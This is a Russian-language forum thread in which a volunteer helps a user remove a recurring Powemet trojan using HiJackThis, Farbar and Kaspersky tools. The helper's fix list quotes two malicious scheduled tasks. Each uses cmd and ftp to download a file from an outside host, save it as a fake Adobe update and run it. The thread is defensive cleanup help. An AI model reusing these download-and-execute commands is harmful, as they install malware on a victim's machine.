1 / 1 / 0
Регистрация: 06.11.2019
Сообщений: 70
1

Trojan:Win32/Powemet.A!attk и не только

26.06.2022, 13:15. Показов 7665. Ответов 135
Метки нет (Все метки)

Здравствуйте, Windows Defender второй день по несколько раз блокирует угрозу Trojan:Win32/Powemet.A!attk, а так же пару раз были другие трояны, но не успел зафиксировать.
SpyHunter 5 нашёл вроде, но нужно ждать 48 часов. Dr Web CureIt не нашёл ничего.
Вложения
Тип файла: zip CollectionLog-2022.06.26-13.10.zip (134.6 Кб, 48 просмотров)
__________________
Помощь в написании контрольных, курсовых и дипломных работ, диссертаций здесь
0
Лучшие ответы (1)
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
26.06.2022, 13:15
Ответы с готовыми решениями:

Trojan:Win32/Powemet.A!attk
Приветствую. Столкнулся со следующим вирусом - Trojan:Win32/Powemet.A!attk. Оказывается, уже чуть...

Trojan:Win32/Powemet.A!attk
Добрый день. Добрый день. Помогите, пожалуйста, решить проблему. Антивирусник находит вирус...

Trojan:Win32/Powemet.A!attk
Добрый день. Защитник Windows блокирует каждый день вирус Trojan:Win32/Powemet.A!attk. Прошу...

Trojan:Win32/Powemet.A!attk
Добрый день, Windows Defender ежедневно по несколько раз блокирует угрозу...

Trojan:Win32/Powemet.A!attk
Добрый вечер. Здравствуйте , помогите пожалуйста с удалением Trojan:Win32/Powemet.A!attk ,...

135
1 / 1 / 0
Регистрация: 06.11.2019
Сообщений: 70
26.06.2022, 17:47  [ТС] 2
MalwareBytes тоже не решил проблему
0
Вирусоборец
10715 / 6095 / 1254
Регистрация: 06.09.2009
Сообщений: 23,600
26.06.2022, 17:59 3
SpyHunter - бесполезная программа. Удалите ее через Установку программ.

Пофиксите в HiJackThis из папки Autologger (запускать HiJackThis от имени Администратора по правой кнопке мыши)
Код
O22 - Task: AdobeUpdateFlac - C:\WINDOWS\system32\cmd.exe /c echo open ftp2.ha7455h6fi1.net>>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.rar c:\windows\Adobeupdate.exe>>s&echo bye>>s&ftp -s:s&c:\windows\Adobeupdate.exe
O22 - Task: AdobeUpdateFlac2 - C:\WINDOWS\system32\cmd.exe /c echo open ftp2.webpublicservices.org>>ps&echo test>>ps&echo 1433>>ps&echo get c.rar c:\windows\help\AdobeFlac.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\AdobeFlac.exe
O22 - Task: BlueStacksHelper - D:\BlueStacks\Client\Helper\BlueStacksHelper.exe -sr (file missing)
O22 - Task: NIUpdateServiceCheckTask - D:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe -c -task (file missing)
O22 - Task: NIUpdateServiceStartupTask - D:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe -startupTask (file missing)
O22 - Task: OneDrive Reporting Task-S-1-5-21-2355657478-4138572427-2348619567-1009 - C:\Users\capta\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting (file missing)
O22 - Task: OneDrive Standalone Update Task v2 - C:\Users\capta\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
O22 - Task: OneDrive Standalone Update Task-S-1-5-21-2355657478-4138572427-2348619567-1009 - C:\Users\capta\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.
0
1 / 1 / 0
Регистрация: 06.11.2019
Сообщений: 70
26.06.2022, 18:20  [ТС] 4
Фикс сделал, spyhunter и malware bytes удалил. Вот логи
Вложения
Тип файла: zip CollectionLog-2022.06.26-18.19.zip (130.9 Кб, 5 просмотров)
0
Вирусоборец
10715 / 6095 / 1254
Регистрация: 06.09.2009
Сообщений: 23,600
26.06.2022, 21:36 5
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.
  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
0
1 / 1 / 0
Регистрация: 06.11.2019
Сообщений: 70
26.06.2022, 21:48  [ТС] 6
Вот
Вложения
Тип файла: zip FRST64.zip (52.0 Кб, 28 просмотров)
0
Вирусоборец
10715 / 6095 / 1254
Регистрация: 06.09.2009
Сообщений: 23,600
27.06.2022, 10:20 7
1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)
Код
Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-2355657478-4138572427-2348619567-1002\...\Run: [GoogleChromeAutoLaunch_92D6FDCFE68BE3E38A01D16C1E9AB766] => "C:\Users\capta\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --shutdown-if-not-closed-by-system-restart (Нет файла)
HKU\S-1-5-21-2355657478-4138572427-2348619567-1002\...\Run: [Reverso] => "C:\Users\capta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Reverso\Reverso.appref-ms" -minimized (Нет файла)
HKU\S-1-5-21-2355657478-4138572427-2348619567-1002\...\MountPoints2: {678e7c6f-eff5-11ec-8a59-a86daa1bd82e} - "E:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-2355657478-4138572427-2348619567-1002\...\MountPoints2: {a39e463a-7c6a-11ec-87c8-a86daa1bd82e} - "E:\autorun.exe" 
HKU\S-1-5-21-2355657478-4138572427-2348619567-1002\...\MountPoints2: {a39e467f-7c6a-11ec-87c8-a86daa1bd82e} - "F:\autorun.exe" 
HKU\S-1-5-21-2355657478-4138572427-2348619567-1002\...\MountPoints2: {a39e4737-7c6a-11ec-87c8-a86daa1bd82e} - "G:\autorun.exe" 
HKU\S-1-5-21-2355657478-4138572427-2348619567-1002\...\MountPoints2: {cf84002c-67b0-11ec-876e-a86daa1bd82e} - "E:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-2355657478-4138572427-2348619567-1002\...\MountPoints2: {d5ec2acf-d8dc-11ec-89f9-a86daa1bd82e} - "E:\HiSuiteDownLoader.exe"
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
Task: {45CF73C8-9A94-47C5-8E45-347738A58FC5} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (Нет файла)
Edge Extension: (Нет имени) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [не найдено]
Edge Extension: (Нет имени) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [не найдено]
Edge Extension: (Нет имени) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [не найдено]
Edge Extension: (Нет имени) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [не найдено]
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
FirewallRules: [TCP Query User{29996110-C4FB-4D1B-ABB4-25762ABA06A3}D:\program files (x86)\it takes two\nuts\binaries\win64\ittakestwo.exe] => (Allow) D:\program files (x86)\it takes two\nuts\binaries\win64\ittakestwo.exe => Нет файла
FirewallRules: [UDP Query User{C338FD7B-EC24-48C7-8A10-0034BF2FED4D}D:\program files (x86)\it takes two\nuts\binaries\win64\ittakestwo.exe] => (Allow) D:\program files (x86)\it takes two\nuts\binaries\win64\ittakestwo.exe => Нет файла
FirewallRules: [{BD48C85F-6BDE-49D4-9AAC-5702E2E8D45E}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe => Нет файла
FirewallRules: [{4623C241-0A0F-443A-B5F0-F26CC7414E50}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe => Нет файла
FirewallRules: [{99924F24-B3FE-47BD-9F7F-7CF12CE48189}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe => Нет файла
FirewallRules: [{1EA0977C-12E7-4A2A-8476-40AC9BA859C5}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe => Нет файла
FirewallRules: [TCP Query User{A43F8BDB-7ACA-479B-A3CF-B86216B47E8C}C:\steamlibrary\steamapps\common\it takes two\nuts\binaries\win64\ittakestwo.exe] => (Allow) C:\steamlibrary\steamapps\common\it takes two\nuts\binaries\win64\ittakestwo.exe => Нет файла
FirewallRules: [UDP Query User{B873A1FD-B85F-483B-9A95-986FDD0F017D}C:\steamlibrary\steamapps\common\it takes two\nuts\binaries\win64\ittakestwo.exe] => (Allow) C:\steamlibrary\steamapps\common\it takes two\nuts\binaries\win64\ittakestwo.exe => Нет файла
FirewallRules: [{A946512C-AF4C-436D-A760-3909D167A4A9}] => (Allow) D:\Download\iphone-unlocker.exe => Нет файла
FirewallRules: [{14E438C6-58D4-4CF8-8FD4-4896FCBA1D17}] => (Allow) D:\Download\iphone-unlocker.exe => Нет файла
AlternateDataStreams: C:\Users\capta\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\capta\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\capta\AppData\Local\VEGAS Pro:$v4 [48]
ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> Нет файла
ContextMenuHandlers5: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} =>  -> Нет файла
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Нет файла
ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} =>  -> Нет файла
ContextMenuHandlers2: [IconPackager] -> {2CF9036B-F720-425F-918C-03A336A65FC4} =>  -> Нет файла
Reboot:
End::
2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
  • Обратите внимание: будет выполнена перезагрузка компьютера.
0
1 / 1 / 0
Регистрация: 06.11.2019
Сообщений: 70
27.06.2022, 17:41  [ТС] 8
вот логи
Вложения
Тип файла: txt Fixlog.txt (12.8 Кб, 8 просмотров)
0
Вирусоборец
10715 / 6095 / 1254
Регистрация: 06.09.2009
Сообщений: 23,600
28.06.2022, 00:10 9
Проблема решена?
0
1 / 1 / 0
Регистрация: 06.11.2019
Сообщений: 70
28.06.2022, 09:55  [ТС] 10
Нет(
Только что включил компьютер и дефендер опять: trojan:win32/powemet.a attk
0
Вирусоборец
10715 / 6095 / 1254
Регистрация: 06.09.2009
Сообщений: 23,600
28.06.2022, 13:48 11
В отчетах Защитника сегодняшняя дата или это старое уведомление?
0
1 / 1 / 0
Регистрация: 06.11.2019
Сообщений: 70
28.06.2022, 13:55  [ТС] 12
Сейчас появилось Backdoor:Win32/Bladabindi!ml

Добавлено через 2 минуты
Сегодняшняя дата, да.
0
Вирусоборец
10715 / 6095 / 1254
Регистрация: 06.09.2009
Сообщений: 23,600
28.06.2022, 14:11 13
Удалите старые файлы FRST.txt и Addition.txt, сделайте новые логи Farbar
0
1 / 1 / 0
Регистрация: 06.11.2019
Сообщений: 70
28.06.2022, 14:42  [ТС] 14
Новые логи
Вложения
Тип файла: zip Addition.zip (51.3 Кб, 20 просмотров)
0
Вирусоборец
10715 / 6095 / 1254
Регистрация: 06.09.2009
Сообщений: 23,600
28.06.2022, 16:09 15
Проверьте компьютер с помощью Kaspersky Virus Removal Tool. Сообщите, будет ли что-либо обнаружено и продолжит ли Защитник находить Trojan:Win32/Powemet.A
0
1 / 1 / 0
Регистрация: 06.11.2019
Сообщений: 70
29.06.2022, 10:05  [ТС] 16
Дефендер всё ещё пишет Trojan:Win32/Powemet.A!attk, вот что касперский нашёл
Миниатюры
Trojan:Win32/Powemet.A!attk и не только  
0
Вирусоборец
10715 / 6095 / 1254
Регистрация: 06.09.2009
Сообщений: 23,600
29.06.2022, 10:50 17
И все детекты Защитника по-прежнему от текущей даты?
0
1 / 1 / 0
Регистрация: 06.11.2019
Сообщений: 70
29.06.2022, 10:52  [ТС] 18
Да, каждый раз при включении защитника. Судя по журналу, это началось аж 12 июня.
Миниатюры
Trojan:Win32/Powemet.A!attk и не только  
0
Вирусоборец
10715 / 6095 / 1254
Регистрация: 06.09.2009
Сообщений: 23,600
29.06.2022, 11:58 19
В установленных программах видны различные версии SQL Server. Есть возможность на какое-то время остановить их работу, корректно отключив все базы данных, и проверить, будет ли Защитник ловить новые угрозы?
0
1 / 1 / 0
Регистрация: 06.11.2019
Сообщений: 70
29.06.2022, 12:28  [ТС] 20
Все службы, связанные с SQL отключил, ничего не изменилось. Вот логи
Вложения
Тип файла: zip Addition (2).zip (51.5 Кб, 13 просмотров)
0
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
29.06.2022, 12:28
Помогаю со студенческими работами здесь

Trojan:Win32/Powemet.A!attk Выдает Defender Win10
Дефендер раз в пару часов блокирует активность с указанием трояна иногда имя трояна меняется на...

Вирус Behavior:Win32/Powemet.B!attk
Добрый день. Помогите, пожалуйста, решить проблему. Антивирусник находит вирус...

Удаление троянов Trojan:Win32/CommandAndControl!rfn и Trojan:Win32/Occamy.C80
Здравствуйте! К сожалению, поймал пару троянов,хотя может их и более, но FRST64.exe показывает...

HEUR:Trojan.Win32.Generic, Trojan-Downloader.Win32.Agent.silkhl
Поставил Kaspersky Free и он начал ругаться на вирусы. При чем лечил и удалял, но потом снова они...

Trojan-Ransom.Win32.Gimemo.jhc, HEUR:Trojan.Win32.Generic
Здравствуйте, уважаемые господа вирусологи, прошу помощи в решении проблем с заразой. Где-то 22...

trojan.win32.generic!bt и trojan.win32.sifef.bb(v) , trojan.win32.sifef.ag
Добрый день.Помогите в борьбе с троянами.Все началось со скачанного торрента.Стали очень меленно...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
20
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2022, CyberForum.ru